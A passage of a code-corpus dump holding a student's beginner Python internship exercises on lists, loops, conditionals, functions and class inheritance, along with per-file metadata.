func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def func2(self):\r\n print(\"This is child class 
method\")\r\nd1=Demo1()\r\nd1.func1()\r\nd1.func2()'''\r\n\r\n#parent & child\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nd1=Demo1()\r\nd1.func1()\r\nd1.func2()'''\r\n\r\n#multi level inheritance\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nclass Demo2(Demo1):\r\n def func3(self):\r\n print(\"This is child method of Demo2 class...\") \r\nd1=Demo2()\r\nd1.func1()\r\nd1.func2()\r\nd1.func3()'''\r\n\r\n#multiple inheritance\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1:\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nclass Demo2(Demo,Demo1):\r\n def func3(self):\r\n print(\"This is child method of Demo2 class...\") \r\nd1=Demo2()\r\nd1.func1()\r\nd1.func2()\r\nd1.func3()'''\r\n\r\n#hierarchical inheritance\r\n'''class Demo:\r\n def __init__(self):\r\n print(\"This is Demo class...\")\r\n def func1(self):\r\n print(\"This is parent class method...\")\r\nclass Demo1(Demo):\r\n def __init__(self):\r\n print(\"This is Demo1 class...\")\r\n def func2(self):\r\n print(\"This is child class method\")\r\nclass Demo2(Demo):\r\n def func3(self):\r\n print(\"This is child method of Demo2 class...\") \r\nd1=Demo1()\r\nd1.func1()\r\nd1.func2()\r\n\r\nd2=Demo2()\r\nd2.func1()\r\nd2.func3()'''\r\n\r\n#hybrid inheritance\r\n#define parent class1\r\n'''class MyParentClass1():\r\n\r\n def method__Parent1(self):\r\n print(\"Parent1 method called\")\r\n\r\n#define parent class2\r\nclass MyParentClass2():\r\n\r\n def method__Parent2(self):\r\n print(\"Parent2 method called\")\r\n\r\n#define Child class\r\nclass ChildClass(MyParentClass1, MyParentClass2): #Multiple Inheritance \r\n \r\n def child_method(self):\r\n print(\"child method\") \r\n\r\n#define Child class2\r\nclass ChildClass(MyParentClass1): #Hierarchical Inherit\r\n#define Child class2\r\nclass ChildClass(MyParentClass1): #Hierarchical Inheritance \r\n def child_method(self):\r\n print(\"child method2\") \r\n\r\nc=ChildClass() #object of child\r\nc.method_Parent1() #parent class1 method\r\nc.method_Parent2() #parent class2 method\r\nc.child_method() #child class method\r\n\r\nc2=ChildClass2() #object of child class 2\r\nc2.child_method() #child class 2 method\r\nc2.method_Parent1() ''' #parent class1 method\r\n\r\n\r\n#overriding\r\n'''class parentclass:\r\n def func1(self):\r\n print(\"Parent method called\")\r\nclass Childrenclass(parentclass):\r\n def func1(self):\r\n print(\"Child method called\")\r\nc=Childrenclass()\r\nc.func1()'''\r\n\r\n#Example2\r\n'''class parentclass:\r\n def func1(self):\r\n print(\"Parent method called\")\r\nclass Childrenclass(parentclass):\r\n def func1(self):\r\n print(\"Child method called\")\r\nc=Childrenclass()\r\nc.func1()\r\nc=parentclass()'''\r\n\r\n#last task\r\n'''class Myclass:\r\n def func1(self,n1,n2):\r\n ans=n1+n2\r\n print(\"Ans is :\",ans)\r\n def func1(self,n1,n2,n3):\r\n ans=n1+n2+n3\r\n print(\"Ans is :\",ans)\r\n 
\r\na=Myclass()\r\n#a.func1(14,78)\r\na.func1(10,20,30)'''\r\n" }, { "alpha_fraction": 0.39615383744239807, "alphanum_fraction": 0.5615384578704834, "avg_line_length": 16.714284896850586, "blob_id": "717b561ab5f1478cae2313c659dbaee4e4411876", "content_id": "a39cd3ea0a764ad1105f42616a73ccf6a0312c7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/Day2task10.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "l1=[10,20,30.5,'Shriya']\r\nprint(l1)\r\nprint(type(l1))\r\nprint(l1[1])\r\nprint(l1 [1:3])\r\nprint (l1[2])\r\nprint (l1[:3])\r\nl1 = (10, 20, 30, \"Akash\", 40, 50, \"Technolabs\", 60)\r\nprint(l1)\r\nprint (l1[2])\r\nprint(l1[0:3])\r\nprint (l1 [5:])\r\nprint (l1[:3])\r\nprint(type(l1))" }, { "alpha_fraction": 0.5596330165863037, "alphanum_fraction": 0.5596330165863037, "avg_line_length": 19.799999237060547, "blob_id": "a1f4bae9c0d467de11b0e925d1ffb1bb11e4c766", "content_id": "aea2a8c81e3991f709cc77e3041e07a60d643d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 109, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/Day4task7.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def myfunction(**arg):\r\n for i,j in arg.items():\r\n print(j)\r\n\r\nmyfunction(name=\"Maki\", nm=\"Yuta\")\r\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.6206896305084229, "avg_line_length": 17.66666603088379, "blob_id": "c01c65ecbdbf7be6592a058033eb0e0c71a668fb", "content_id": "ddd0bb6084afc313990a1f8070889f97a57040f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 37, "num_lines": 6, "path": "/Day4task9.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def my_func():\r\n x=10\r\n print(\"Value inside function:\",x)\r\nx=20\r\nmy_func()\r\nprint(\"Value outside function:\",x)" }, { "alpha_fraction": 0.4430379867553711, "alphanum_fraction": 0.49367088079452515, "avg_line_length": 18.25, "blob_id": "0640ac61cf9f2b448b5d786cdd1465a06072ae20", "content_id": "c36e24badf64d4655bf4d6f9d275323a136acbd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day3task14.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "for x in range(10):\r\n if x%2==0:\r\n continue\r\n print(\"Value is:\",x)" }, { "alpha_fraction": 0.7033898234367371, "alphanum_fraction": 0.7033898234367371, "avg_line_length": 37.33333206176758, "blob_id": "d3ed2679c216917047ea34a7a5a2483d76e54c2f", "content_id": "30665f8905fcb901abdee3bd0d2a6da1ea8e2c58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/Day2task1.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "print(\"Hello World\")\r\n'''This is example of multi-line comments'''\r\n\"\"\"This is also example of multiline comments\"\"\"\r\n" }, { "alpha_fraction": 0.37719297409057617, "alphanum_fraction": 0.4912280738353729, "avg_line_length": 14.571428298950195, "blob_id": 
"581f48a3502d07cb4951c4432e2b22398d141338", "content_id": "9b5f0b6ef0a353b646567cdfbbf0bbf9e2d6a4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 24, "num_lines": 7, "path": "/Day4task6.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def sum(*n1):\r\n sum=0\r\n for i in n1:\r\n sum=sum+i\r\n print(\"Ans is \",sum)\r\nsum(10,20)\r\nsum(10,20,30)" }, { "alpha_fraction": 0.45945945382118225, "alphanum_fraction": 0.5675675868988037, "avg_line_length": 10.333333015441895, "blob_id": "2477af2b2a87bb50b2bb35fde1e6b10592c41215", "content_id": "67787ee4823d296e029cda1bd05506493329209e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 26, "num_lines": 9, "path": "/Day3task2.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#IF STATEMENT\r\n\r\nn1=20\r\nn2=30\r\nif n1>n2:\r\n print(\"n1 is greater\")\r\n\r\nif n1<n2:\r\n print(\"n2 is greater\")\r\n" }, { "alpha_fraction": 0.4811320900917053, "alphanum_fraction": 0.5, "avg_line_length": 24.5, "blob_id": "afe3e098074d991c6883915b6062a58c115318d4", "content_id": "703764c7880e2398eff79f2cb5d4246f3e4b3287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 106, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/Day2task5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a = b = c = 10\r\nprint(\"Value of a is : \", a)\r\nprint(\"Value of b is : \", b)\r\nprint(\"Value of c is : \", c)\r\n" }, { "alpha_fraction": 0.38793104887008667, "alphanum_fraction": 0.4913793206214905, "avg_line_length": 14.571428298950195, "blob_id": "0ac4f8f5e6fa222028e9cf20cfbaf4d2c42bb60d", "content_id": "8ba98ccc9476d3d79997652e59fad6fbc6739907", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 21, "num_lines": 7, "path": "/Day4task8.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def add(*num):\r\n sum=0\r\n for n in num:\r\n sum=sum+n\r\n print(\"Sum:\",sum)\r\nadd(120,30)\r\nadd(23,12,45)\r\n" }, { "alpha_fraction": 0.5420560836791992, "alphanum_fraction": 0.5887850522994995, "avg_line_length": 25.25, "blob_id": "63cf5b0835d738782ea70cf5931bcd395896e509", "content_id": "06b9958a3c01e6eb187893a6144c1031006e17b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 107, "license_type": "no_license", "max_line_length": 35, "num_lines": 4, "path": "/Day2task4.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a,b,c = 15, 15.5, \"Akash Technolab\"\r\nprint(a)\r\nprint(\"Value of b is : \", b)\r\nprint(\"Company name is : \", c)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5909090638160706, "avg_line_length": 10.44444465637207, "blob_id": "9370a148b388438432498c7d106d78738d66c3b3", "content_id": "26a3134d65b500c4744a506c7a69b12d888e2ef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 26, "num_lines": 9, "path": "/Day3task3.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#IF ELSE 
STATEMENT\r\n\r\nn1=20\r\nn2=30\r\nif n1>n2:\r\n print(\"n1 is greater\")\r\n\r\nelse:\r\n print(\"n2 is greater\")" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 24.799999237060547, "blob_id": "4a0c4072f835181d1d81037de5ce90e0cd6c7c92", "content_id": "0c76c84687d2abf57b4f88c6274c0eb6d1ee0b15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/Day2task3.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "name=\"Shriya Patel\"\r\nprint(\"Name is : \", name)\r\n#assigning a new value to website\r\nname=\"Asmita Chowdhury.com\" \r\nprint(\"Name is : \", name)" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 18.200000762939453, "blob_id": "a8d849ca7302a3a12f60d8e28c4aece81ebb9acd", "content_id": "3c93033d930b0d3e16571568e22065447bc1ee66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/Day4task1.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def myfunction(name):\r\n print(\"Hello World\")\r\n print(\"Name is:\",name)\r\n\r\nmyfunction(\"Shriya\")" }, { "alpha_fraction": 0.5149253606796265, "alphanum_fraction": 0.5671641826629639, "avg_line_length": 25.200000762939453, "blob_id": "529664d74ff035e6802683222627980fa772c6e2", "content_id": "1d9e7954c3c8c9c3b86b31fcfac7caad8dbeac6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/Day3task12.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "list1 = [10, 20, \"Netflix\"]\r\nfor i in range(len(list1)):\r\n print('Value is :', list1[i])\r\nelse:\r\n print(\"No elements left.\")" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5980392098426819, "avg_line_length": 24, "blob_id": "1a7fc1a79d6457d87baf89b0e07aa20008952516", "content_id": "888b9104ddad173884484a8cea21e3f8dba213f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 36, "num_lines": 4, "path": "/Day3task10.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "list1 = [10, 20, \"Akash Technolabs\"]\r\n\r\nfor i in range(len(list1)):\r\n print('Value is :', list1[i])" }, { "alpha_fraction": 0.4126984179019928, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 13.75, "blob_id": "18fda3256e211c725bf7f8141e1b110c1b187d6b", "content_id": "5782dd00ff0ec69d25ee97c7c0c3b8e694c2bf05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/Day4task5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def calSum(n1, n2):\r\n print(n1+n2)\r\n\r\ncalSum(n2=10, n1=20)\r\n" }, { "alpha_fraction": 0.49193549156188965, "alphanum_fraction": 0.524193525314331, "avg_line_length": 13.75, "blob_id": "3e902335dfa69f6858de5e53055ccde5adeda256", "content_id": "05ef62af5705530fe69d2c987785e881113b2850", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 27, "num_lines": 8, "path": "/Day3task11.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a=[12,14,\"happy\"]\r\nprint(a)\r\n\r\nfor i in a:\r\n print(\"Value is \",i)\r\n\r\nfor j in range(len(a)):\r\n print(\"Value is \",a[j])" }, { "alpha_fraction": 0.353658527135849, "alphanum_fraction": 0.4146341383457184, "avg_line_length": 12, "blob_id": "7b97e36009cb4afa8347ce670fc355e2bcdb7963", "content_id": "fadac3218a5ae918b32a4698cef99e8947332db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 24, "num_lines": 6, "path": "/Day3task13.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "i=0\r\nwhile i<10:\r\n print(\"Value is:\",i)\r\n i +=1\r\n if i>=5:\r\n break" }, { "alpha_fraction": 0.56175297498703, "alphanum_fraction": 0.5936254858970642, "avg_line_length": 21, "blob_id": "a94fe118fda97a2884a960a4b6e04c3f8600033c", "content_id": "5d1164b6c53b9d3d5ff281bf9d41115356b215ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 251, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/Day3task9.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "for i in range(10):\r\n print(\"value is\", i)\r\nprint(\"These are values of i\\n\")\r\n\r\nfor j in range(1,5):\r\n print(\"value is\", j)\r\nprint(\"These are values of j\\n\")\r\n\r\nfor k in range(1,10, 2):\r\n print(\"value is\", k)\r\nprint(\"These are values of k\\n\")" }, { "alpha_fraction": 0.4464285671710968, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 17.33333396911621, "blob_id": "ef173ef50b9fa6c7fbfa473fe852825375df1944", "content_id": "bbcb33382f73a51eccd5406e5fec4139f9fa06d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/Day4task4.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def sum(a,b):\r\n print(\"Sum is:\",a+b)\r\nsum(b=240,a=20)" }, { "alpha_fraction": 0.44117647409439087, "alphanum_fraction": 0.5441176295280457, "avg_line_length": 15.5, "blob_id": "8ab8741ed846554f65f4fcfa92d91215bc975ef0", "content_id": "7aa17f2b9862d78c1473e8e8a580511984e079ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day3task8.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "l1=[30,40,'hey!']\r\nprint(l1)\r\nfor i in l1:\r\n print(\"value is \",i)" }, { "alpha_fraction": 0.4166666567325592, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 12.800000190734863, "blob_id": "72c2e30f8451109a99ca15fca3e2884f1395faa9", "content_id": "bf0961fb1cdee57abb353f3f07a17d9c93bc0305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 27, "num_lines": 5, "path": "/Day4task3.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def calSum(n1=100, n2=200):\r\n print(n1+n2)\r\n\r\ncalSum(10,20)\r\ncalSum()" }, { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 
0.4615384638309479, "avg_line_length": 20.571428298950195, "blob_id": "1672f8ca67b74f7972463b2574c5beb1d9da4a8d", "content_id": "ea61417d25b85cf07e90bc431750987bfe5cdbe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 42, "num_lines": 7, "path": "/Day2task11.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "d = { 1: 'Satoru',2: 'Suguru', 'key': 10 }\r\nprint (type(d))\r\n\r\nprint (\"d[1] = \", d[1])\r\nprint (\"d[2] = \", d[2])\r\nprint (\"d[key] = \", d['key'])\r\n#disctionary" }, { "alpha_fraction": 0.5430463552474976, "alphanum_fraction": 0.5827814340591431, "avg_line_length": 17.125, "blob_id": "5c432cc7c59dbfafebec154b4bb7426c51e01165", "content_id": "611b1dec0eb025047887bfdd93177f88cae47b3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 24, "num_lines": 8, "path": "/Day2task7.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "name=\"Shriya Patel\"\r\nprint(\"Name is :\", name)\r\nprint(name [0])\r\nprint(name [2:5])\r\nprint(name[2:])\r\nprint(name [:4])\r\nprint(name*2)\r\nprint (name + \" Hello \")" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.6307692527770996, "avg_line_length": 14.25, "blob_id": "111e458666c738c0dd8e2eeafe3c0ce7fb60dbc1", "content_id": "ac92be8695c4ae8c78ea2176ae49b051652472b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 22, "num_lines": 8, "path": "/Day4task2.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def myfunction():\r\n name=\"Shanish\"\r\n n1=20\r\n return name,n1\r\n\r\nname,n1=myfunction()\r\nprint(\"Name is \",name)\r\nprint(\"n1 is \",n1)\r\n" }, { "alpha_fraction": 0.720588207244873, "alphanum_fraction": 0.720588207244873, "avg_line_length": 21.33333396911621, "blob_id": "c7bb7b834a0e8dc515be407ff6b3ca27957d54c8", "content_id": "a7b2b3fe75f876610fe71593552dc59bf20c90cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68, "license_type": "no_license", "max_line_length": 30, "num_lines": 3, "path": "/Day4task10.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "import demo \r\nname=demo.myfunction(\"shriya\")\r\nprint(\"Name is \",name)" }, { "alpha_fraction": 0.35593220591545105, "alphanum_fraction": 0.4237288236618042, "avg_line_length": 12.75, "blob_id": "8ca040bc7b38c4baa6cde371db0f04eda3ea84ba", "content_id": "5c3896d2a161c565ed51c6b886d95247e8939f5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/Day3task6.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "i=1\r\nwhile i<=10:\r\n print(\"value is \", i)\r\n i +=1\r\n" }, { "alpha_fraction": 0.32786884903907776, "alphanum_fraction": 0.5163934230804443, "avg_line_length": 32.85714340209961, "blob_id": "bf4ac4836d5f793b4458d4ad861d001ba548d438", "content_id": "0d9403ccbf42b1375b4be8aafc5cc8ae45cfeb35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 55, "num_lines": 
7, "path": "/Day2task9.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "list1 = [10, 20, 30, \"Akash\", 40, 50, \"Technolabs\", 60]\r\n#list1[2] = 30\r\nprint (\"liat1[2] = \" , list1[2])\r\n#list1[0:3]= [10,20,35]\r\nprint(\"iist1 [0:3] = \" , list1[0:3])\r\n#list1[5:] = [50, 'Technolabs', 60]\r\nprint (\"list1 [5:] = \", list1 [5:])\r\n" }, { "alpha_fraction": 0.6354166865348816, "alphanum_fraction": 0.6354166865348816, "avg_line_length": 22.5, "blob_id": "38d26e07474f152e43a74a58f4a2ee8be2a3a592", "content_id": "6f6ae5f32ed591091e1e8487bb236465c5f21295", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/Day3task1.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a=int(input(\"Enter first no:\"))\r\nb=int(input(\"Enter second no:\"))\r\nans=a+b\r\nprint(\"Ans is:\",ans)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5804597735404968, "avg_line_length": 12.666666984558105, "blob_id": "373c310eeae8b89da8f5a1461e5750a9d2332508", "content_id": "c42aa7c96ec69e8023c3f779b3cc850c5989c3b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 37, "num_lines": 12, "path": "/Day3task4.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#IF ELIF ELSE STATEMENT\r\n\r\nn1=20\r\nn2=30\r\nif n1==n2:\r\n print(\"Both n1 and n2 are equal\")\r\n\r\nelif n1>n2:\r\n print(\"n1 is greater\") \r\n\r\nelse:\r\n print(\"n2 is greater\")" }, { "alpha_fraction": 0.455089807510376, "alphanum_fraction": 0.514970064163208, "avg_line_length": 13.363636016845703, "blob_id": "fcda86034569816478b2af7cbd69092266993f9b", "content_id": "9696bfa1a51d4c564f4d0e5b2a90556da8a6a134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 31, "num_lines": 11, "path": "/Day3task5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#NESTED IF STATEMENT\r\n\r\nn1=10\r\n\r\nif n1>=0:\r\n if n1==0:\r\n print(\"n1 is Zero\")\r\n else: \r\n print(\"n1 is Positive\")\r\nelse:\r\n print(\"n1 is Negative\")" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.6570048332214355, "avg_line_length": 27.85714340209961, "blob_id": "a0487463d54d07b1f405f7b016e99fb2ccb4fc47", "content_id": "be295b72209f70c0babb946772659556e2bd8c60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 57, "num_lines": 7, "path": "/Day2task6.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "n1=10\r\nprint(n1, \"is of type\", type(n1))\r\nn2=10.5\r\nprint(n2, \"is of type\", type(n2))\r\nprint(n2, \"is complex number?\", isinstance(10.5,int))\r\nn3=1+2j\r\nprint(n3, \"is complex number?\", isinstance(1+2j,complex))" } ]
34
rnoshir/visualization_matplotlib_project
https://github.com/rnoshir/visualization_matplotlib_project
15a59966115e32970d64d90b42fb7dc3b8e3c63a
cacac8728a58aeef3566344c59d415ff9e39976a
7705874a437938a01b207e6e472adfacfd3196a1
refs/heads/master
2021-08-31T20:17:55.402203
2017-12-22T18:01:49
2017-12-22T18:01:49
114,914,054
0
0
null
2017-12-20T17:34:21
2017-10-01T12:46:31
2017-12-19T18:03:04
null
[ { "alpha_fraction": 0.6822429895401001, "alphanum_fraction": 0.6822429895401001, "avg_line_length": 23.69230842590332, "blob_id": "1cfb6576973dac2ea77126c0b25eae205f10e12e", "content_id": "6ddaf9b1754b4dee90cf712e2d79f1314871543b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/q02_plot_matches_by_team/build.py", "repo_name": "rnoshir/visualization_matplotlib_project", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_matches_by_team():\n teams=ipl_df[['batting_team']]\n g_teams=teams.groupby('batting_team')\n g_teams[['batting_team']].count().plot(kind='bar')\n plt.show()\n" }, { "alpha_fraction": 0.6397228837013245, "alphanum_fraction": 0.6581985950469971, "avg_line_length": 24.47058868408203, "blob_id": "be1e2f23caadbd56a45e96b4aa0eb9793ab63ff9", "content_id": "683d55fdd5c822d8a06a11f2d2d7ada35dd7a0ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "no_license", "max_line_length": 60, "num_lines": 17, "path": "/q03_plot_innings_runs_histogram/build.py", "repo_name": "rnoshir/visualization_matplotlib_project", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_innings_runs_histogram():\n data=ipl_df[['batting_team','inning','runs']]\n g_inning=data.groupby(['batting_team','inning'])\n runs=g_inning['runs'].count().unstack()\n plt.subplot(1,2,1)\n plt.hist(runs[1])\n plt.subplot(1,2,2)\n plt.hist(runs[2])\n plt.show()\n" } ]
2
jeevsand/naan-factory
https://github.com/jeevsand/naan-factory
14708971ab7f66455ce127e9e59be7898b1aeb28
9b56f90ba90a697e0bb034a452ee7ddce2ef046c
95dc2ed9e3f79a177e80a62ec46251e04dcb272c
refs/heads/master
2020-06-24T15:35:26.036784
2019-07-24T14:53:00
2019-07-24T14:53:00
199,002,549
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6775568127632141, "alphanum_fraction": 0.6889204382896423, "avg_line_length": 15.785714149475098, "blob_id": "081bd8026023154fb8db21b35b85ea5d13317f20", "content_id": "8d98472baefd0845af0e124d5d4f7af38b2d9251", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 704, "license_type": "no_license", "max_line_length": 54, "num_lines": 42, "path": "/README.md", "repo_name": "jeevsand/naan-factory", "src_encoding": "UTF-8", "text": "#This is a title\n##This is a subtitle (h2)\n###This is a smaller subtitle (h3)\n####This is a h4\nthis is a text \n\nthis is a text in **bold**\n\n- bullet points \n\n1) add a git\n2) add a git ignore file (touch .gitignore)\n3) git add .\n\n\n## Naan Factory Specs\nWe need to build a naan factory.\nThe following is what we need:\n#### make_dough function \nTakes in:\n- 'wheat'\n- 'water'\n\nShould return: 'dough'\n\n####bake_naan function \nTakes in:\n- 'dough'\n\nreturnds: 'naan'\n\n\n\n\n#Assignment \n\n- create a new project \n- add git tracting \n- write test for your naan factory \n- write function to make all test pass \n- write a README.md file explain task and functions \n- you should have atleast 3 to 5 commits in your logs." }, { "alpha_fraction": 0.7254063487052917, "alphanum_fraction": 0.7322497963905334, "avg_line_length": 26.85714340209961, "blob_id": "1d85b75e0e836e6c99bc3e72e8f948b8cadcef80", "content_id": "960070035a4f5d37cefcfff88fde38a089dbd76c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1169, "license_type": "no_license", "max_line_length": 92, "num_lines": 42, "path": "/hello.py", "repo_name": "jeevsand/naan-factory", "src_encoding": "UTF-8", "text": "##FUnction principles:\n #they only do one job\n #should be unitary\n #should do the above so they are testable\n #do not print inside functions... you return\n #need to be called to run\n\n#Unit tests : are tests that test 1 function\n\n#TDD: Test driven development\n#write your tests according to specs\n#Then follow the errors and iterate until test pass\n\ndef say_hello():\n return 'hello'\n\nprint (say_hello())\n\ndef say_hello_personal(name_arg):\n return 'hello ' + name_arg.capitalize()\n\ndef full_name_hello(arg1,arg2):\n return 'hello '+arg1.capitalise()+ ' '+arg2.capitalise()\n\nprint 